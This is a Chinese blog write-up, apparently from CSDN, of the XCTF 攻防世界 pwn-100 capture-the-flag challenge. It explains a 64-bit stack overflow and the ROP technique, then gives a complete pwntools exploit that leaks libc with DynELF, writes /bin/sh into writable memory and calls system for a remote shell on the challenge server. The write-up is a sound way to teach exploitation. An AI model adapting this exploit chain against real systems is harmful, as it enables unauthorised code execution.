攻防世界 Pwn pwn-100

最新推荐文章于 2023-02-15 17:09:00 发布
最新推荐文章于 2023-02-15 17:09:00 发布
阅读量597 收藏 1
点赞数
分类专栏: Pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MrTreebook/article/details/121886392
版权

攻防世界 Pwn pwn-100

1.题目下载地址

点击下载

2.checksec

在这里插入图片描述

64位程序,目前还什么都看不出看来,直接拉近IDA看看

3.IDA分析

在这里插入图片描述

在这里插入图片描述

  • 整个程序由3个嵌套的程序组成

  • 我们可以看到sub_40063D是主要的程序,接受单个字符并存储到传入的参数a1所指向的空间之内

  • 同时分析sub_40068E发现sub_40063D中a1就是sub_40068E中的v1

  • 并且v1的栈空间大小就只有0x40,而sub_40063D接受的输入量有0x200个字节,这样就存在栈溢出漏洞了。

  • 在这里插入图片描述

  • 通过分析函数列表,里面有puts这个库函数,联系pwntools中的DynELF,我们可以将libc的地址泄露出来,再来构造ROP

  • 64位程序构造ROP与32位程序不一样
    x86中,函数调用是直接将参数压栈,需要用的时候直接将参数放在栈上,调用的函数就能直接取得参数并运算。如图:
    在这里插入图片描述

调用read函数的时候,参数直接放入栈中,但是x64的程序不一样,x64的gcc优化了x86的传参方式,x64程序设立了几个寄存器李存放参数,调用函数的时候先向寄存器之中放参数,当参数的数量大于寄存器的时候,才会向栈中放参数。
在这里插入图片描述

这是本题中的sub_40068E函数,可以看到其参数是放在rdi和esi两个寄存器之中的,这就是两种结构的不一样,如果要在x64的程序之中构造rop,我们就必须向寄存器存放参数。
在这里插入图片描述

可看出只要rbx和rbp不相同就会跳转回去循环,这是我们不允许的,我们需要控制程序流ret到我们需要的地方去,故预先设置rbx=0,rbp=1即可让程序继续执行我们构造的ROP链。故可以构造payload1=‘a’*0x48+p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main) 泄露puts的地址,从而确定libc和libcbase
在这里插入图片描述
经过查找发现不存在/bin/sh,需要自己写入,gdb中vmmap发现0x601000为基址的地址可写,到ida查找,选择0x601040进行写入
在这里插入图片描述

4.exp

from pwn import *
# context.log_level = 'debug'
io = remote('111.198.29.45',57902)
# io = process("./pwn100")
elf = ELF("./pwn100")

rop1 = 0x40075A #pop rbx_rbp_r12_r13_r14_r15
rop2 = 0x400740 #rdx(r13), rsi(r14), edi(r15d)
pop_rdi_ret = 0x400763
# start_addr = elf.symbols['_start']
start_addr = 0x400550
puts_plt = elf.plt['puts']
read_got = elf.got['read']
binsh_addr = 0x601000


def leak(addr):
  payload = "a" * 0x48 + p64(pop_rdi_ret) + p64(addr) + p64(puts_plt) + p64(start_addr)
  payload = payload.ljust(200, "a")
  io.send(payload)
  io.recvuntil("bye~\n")
  up = ""
  content = ""
  count = 0
  while True:
    c = io.recv(numb=1, timeout=0.5)
    count += 1
    if up == '\n' and c == "":
        content = content[:-1] + '\x00'
        break
    else:
        content += c
        up = c
  content = content[:4]
  log.info("%#x => %s" % (addr, (content or '').encode('hex')))
  return content

d = DynELF(leak, elf = elf)
sys_addr = d.lookup('system', 'libc')
log.info("system_addr => %#x", sys_addr)

payload  = "a" * 0x48 + p64(rop1) + p64(0) + p64(1) + p64(read_got) + p64(8) + p64(binsh_addr) + p64(1)
payload += p64(rop2)
payload += "\x00" * 56    #rop2结束又跳转到rop1,需要再填充7 * 8字节到返回地址
payload += p64(start_addr)
payload  = payload.ljust(200, "a")
io.send(payload)
io.recvuntil("bye~\n")
# gdb.attach(io)
io.send("/bin/sh\x00")

payload = "a" * 0x48 + p64(pop_rdi_ret) + p64(binsh_addr) + p64(sys_addr)
payload = payload.ljust(200, "a")
io.send(payload)

io.interactive()
==Microsoft==
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
PWN篇:攻防世界PWN-100
weixin_44644249的博客
02-04 400
攻防世界进阶PWN-100 做这道题的时候远程环境可能有点问题,链接上收不到字符,在本地跑exp是可以拿到shell的。之前以为写错了,买了wp试也不行,重开环境还是不行,先记录一下,以后能连上了再提交flag。 查看保护 IDA分析 主函数 sub_40068e sub_40063d 思路分析 sub_40063d接收两个参数(IDA解析这里有点问题,可以查看汇编代码分析),a2=200,a1=&v1[64] 当 i 小于200,read输入到v1,这个就是溢出点,当 i >=
攻防世界 pwn-100
10-26 291
1 题目 2 分析 如上图,这道题很简单粗暴,直接暴露溢出点,但是需要注意的是,每次输入读200!这点下面会有坑。 思路:利用ROP泄露出read的地址,利用Libsearch获得system和/bin/sh的地址。这些都是常规流程。但是,有一点要注意,在发送payload的时候,一定不能使用sendline或者sendafterline。因为这两个方法会自动在你的payload后面添加\n。本题严格读取200单元,多出来的\n作为下次读取的开头,会导致第二次发送的错误!exp如下 f
pwn入门题目汇总.rar
09-01
pwn入门题目汇总.rar
攻防世界 pwn--pwn-100
YANG12345_6的博客
11-28 3295
一、checksec一下 开启了NX 二、 file一下,查看文件属性 64位文件 三、执行 让用户不断输入 四、拖进ida里分析看反汇编代码 主要代码: 数组v1的大小是0x40,后面利用的read函数的size是0xC8,有栈溢出漏洞 五、在ida里没有找到可以利用的system("bin/sh)和system("cat flag") 六、原程序中没有调用system函数,在GOT和PLT表中没有随system函数的记录,只能从libc中寻找system函数 有puts和read函数,可以利用
攻防世界pwn-100(两种方法)详细分析
qy201706的博客
05-05 1784
这题是比较基础的构造ROP链也比较典型,本菜鸡学了受益匪浅(っ °Д °;)っ 0x1 checksec + file 0x2 拖进ida分析程序: 显然应该进sub_40068E里看看: 鸭儿,继续进sub_40063D(v1,200): 这里就是一个for循环,每次向 i + a1(即:i + v1)所指的内存读取输入1个字节,i 不能大于200 貌似无懈可击,返回去查...
攻防世界 - pwn100 - WriteUp
哒君的博客
06-11 4089
pwn100 文件链接 -> Github checksec 寻找漏洞 sub_40063D 函数中获取输入存放到 v1 ,存在栈溢出漏洞 攻击思路 该程序中没用system函数,也没有binsh字符串,而且参数是经过寄存器传递的,所以要通过ROP来达成泄露 libc ,写入 /bin/sh 的操作 寄存器 rdi 中存放的是写入的地址,rsi 是写入的字节数,所以可以通过 po...
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
攻防世界pwn题:forgot.doc
07-13
攻击防御世界pwn题:forgot.doc 本文档是关于攻击防御世界pwn题的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...
browser-pwn-advent-calendar
05-28
总的来说,Browser Pwn Advent Calendar提供了一个互动的学习平台,让参与者能够提升在JavaScript和浏览器安全领域的技能,通过实践来应对现实世界中的威胁。通过完成这些挑战,不仅可以增强对浏览器漏洞的理解,也...
pwn100题目文件及exp.zip
08-09
栈溢出漏洞,没有system函数下需要使用DynELF函数来泄漏函数地址,本资源是利用read和puts函数来进行泄漏
PWN测试题目
07-18
信息安全PWN测试题目:用于CTF的练习与PWN的学习,测试题目
2017湖湘杯pwn100题目
11-30
2017湖湘杯pwn100题目的二进制文件和libc的二进制文件
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
level0 -- 攻防世界新手题
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
[攻防世界 pwn]——pwn-100
Y_peak的博客
02-21 236
[攻防世界 pwn]——pwn-100 题目地址: https://adworld.xctf.org.cn/ 题目: checksec一下 IDA中 sub_40063D函数的作用就是读入200个字符, 不然不退出循环 思路 leek出来一个地址, 然后找到libc, 计算偏移找到system 和 ‘/bin/sh’ 循环调用, 得到shell from pwn import * from LibcSearcher import * #p = process("./pwn") p = remo
攻防世界pwn100 详细的WP
Zarcs_233的博客
01-20 808
pwn萌新做pwn题了 首先checksec shellcode肯定是行不通了 IDA打开看看 发现有个函数,读取200字节,但a1数组却只有40字节,出现了栈溢出漏洞,那么EIP就是在48字节之后的八个字节 查看程序导入,发现没有system,查看string,发现没有’/bin/sh’ 所以要先想办法泄露system的地址,用Dynelf即可,那么如何写泄露函数呢? 由于是64位系统,所以得...
pwn-100(L-CTF-2016)的个人想法(含DynELF的使用)
fzucaicai的博客
02-15 296
DynELF是一个用于动态获取库函数地址的类,可以在程序运行时获取库函数的地址,而不需要提前知道库函数的地址。在这段代码中,是创建一个DynELFleak是一个用于泄漏内存地址中的内容的函数;elf=elf是pwn100程序的ELF对象,用于获取程序中的一些基本信息(如函数地址、数据段地址、代码段地址等)。DynELF类会根据提供的泄漏函数leak中泄漏出来的puts函数地址和程序中的ELF信息,动态计算出libc库的基地址,然后可以使用d.lookup方法根据libc库中的函数名获取该函数的地址。
pwnpwn-100
醉等佳人归
09-06 438
1.题目 1.1.保护机制 没开canary和ASLR,只开了NX 1.2.关键代码 2.思路 很明显就是一个简单栈溢出漏洞,但是发现没有提供lib文件,导致我们不能直接去泄漏puts加载地址然后计算偏移得到system的地址,pwn库提供了一个通过泄漏地址遍历lib库 d = DynELF(leak,elf=elf) system_addr = d.lookup('system','libc') leak参数是一个函数,函数参数为地址,地址由DynELF提供,函数功能就是通过参数地址泄漏出该地址指
攻防世界pwn-forgot
最新发布
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

==Microsoft==

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值